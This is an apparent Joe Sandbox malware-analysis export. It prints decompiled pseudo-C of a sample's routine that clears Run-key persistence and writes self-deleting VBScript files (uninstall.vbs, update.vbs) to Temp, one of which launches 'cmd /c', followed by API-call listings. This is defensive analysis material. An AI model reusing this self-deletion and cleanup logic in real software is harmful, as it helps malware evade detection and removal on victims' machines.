                                  C-Code - Quality: 19%
                                  			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                  0x0040824e
                                  0x0040825a
                                  0x00408261
                                  0x00408261
                                  0x0040826d
                                  0x0040826f
                                  0x0040826f
                                  0x0040827b
                                  0x00408282
                                  0x00408289
                                  0x0040828e
                                  0x0040829e
                                  0x004082a8
                                  0x004082ac
                                  0x004082b5
                                  0x004082ba
                                  0x004082ba
                                  0x004082c4
                                  0x004082c8
                                  0x004082d5
                                  0x004082da
                                  0x004082da
                                  0x004082e4
                                  0x004082e8
                                  0x004082f9
                                  0x004082fe
                                  0x004082fe
                                  0x00408301
                                  0x00408316
                                  0x00408318
                                  0x00408321
                                  0x0040832a
                                  0x0040834a
                                  0x00408352
                                  0x00408357
                                  0x0040835c
                                  0x00408368
                                  0x00408368
                                  0x00408370
                                  0x00408378
                                  0x0040837e
                                  0x00408390
                                  0x00408394
                                  0x0040839a
                                  0x004083a6
                                  0x004083ad
                                  0x004083ad
                                  0x004083bf
                                  0x004083c7
                                  0x004083c9
                                  0x004083c9
                                  0x004083cc
                                  0x004083da
                                  0x004083e5
                                  0x004083f0
                                  0x004083fb
                                  0x00408401
                                  0x0040840d
                                  0x0040841d
                                  0x00408422
                                  0x00408428
                                  0x00408432
                                  0x0040843d
                                  0x00408447
                                  0x0040844e
                                  0x00408457
                                  0x00408460
                                  0x00408464
                                  0x00408469
                                  0x00408470
                                  0x00408479
                                  0x00408482
                                  0x0040848b
                                  0x0040848b
                                  0x0040849d
                                  0x004084a9
                                  0x004084b0
                                  0x004084b4
                                  0x004084bd
                                  0x004084c1
                                  0x004084c6
                                  0x004084cd
                                  0x004084d6
                                  0x004084df
                                  0x004084e8
                                  0x004084f2
                                  0x004084fc
                                  0x004084fc
                                  0x00408502
                                  0x00408503
                                  0x0040850a
                                  0x00408512
                                  0x0040851b
                                  0x00408524
                                  0x00408528
                                  0x0040852d
                                  0x00408534
                                  0x0040853d
                                  0x00408546
                                  0x00408546
                                  0x00408554
                                  0x00408560
                                  0x0040856a
                                  0x00408576
                                  0x0040857d
                                  0x00408582
                                  0x00408587
                                  0x0040858f
                                  0x0040859c
                                  0x0040859c
                                  0x004085a3
                                  0x004085a9
                                  0x004085aa
                                  0x004085ab
                                  0x004085af
                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
